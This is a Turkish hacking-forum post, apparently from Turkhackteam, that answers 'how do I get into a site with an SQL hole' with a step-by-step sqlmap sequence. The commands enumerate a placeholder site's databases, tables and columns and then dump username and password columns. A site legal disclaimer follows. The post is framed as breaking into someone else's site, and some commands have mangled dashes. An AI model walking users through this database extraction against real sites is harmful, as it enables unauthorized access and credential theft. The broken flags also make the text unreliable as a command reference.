Sitenin sql açığını buldum naasıl sızıcam
sqlmap -u https://www.ornek-site.com/page.php?id=5 - -dbs
sqlmap -u https://www.ornek-site.com/page.php?id=5 - D database --tables
Bir parametrenin bir sonraki adımına geçerken ‘-’ karakterlerinden biri silinir ve parametrenin baş harfi kullanılarak diğer adıma geçer. Örn;
--dbs → -D
--tables →- T
--columns parametresinin ne olduğunu açıklamamıza sanırım gerek yok. Tool’a dediğimiz cümle tam olarak şu: “database veri tabanındaki table tablosundan kolonları çek.”sqlmap -u https://www.ornek-site.com/page.php?id=5 - D database -T table --columns
Burada bir kolondaki verileri çekmek için bu şekilde bir komut girdisi yapabiliriz. Birden fazla kolondaki veriyi çekmek için ise (örn; username,password veya id,username,password gibi);sqlmap -u https://www.ornek-site.com/page.php?id=5 - D database -T table -C column1 --dump
şeklinde bir komut satırı kullanabiliriz. Genellikle iki adet kolonu çekmenin amacı birbirleriyle bağlantılı veri kolonlarının karışmaması içindir. Örneğin bir sistemde admin kullanıcının id’si 1, kullanıcı adı admin, şifresi admin123 gibi şeyler olabilir. SQLMap bu bilgileri tek tek çekince karışık vaziyette karşınıza çıkarsa da hepsini birlikte çekince bir tablo şeklinde önünüze sunar.sqlmap -u https://www.ornek-site.com/page.php?id=5 — D database -T table -C column1,column2 --dump
Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.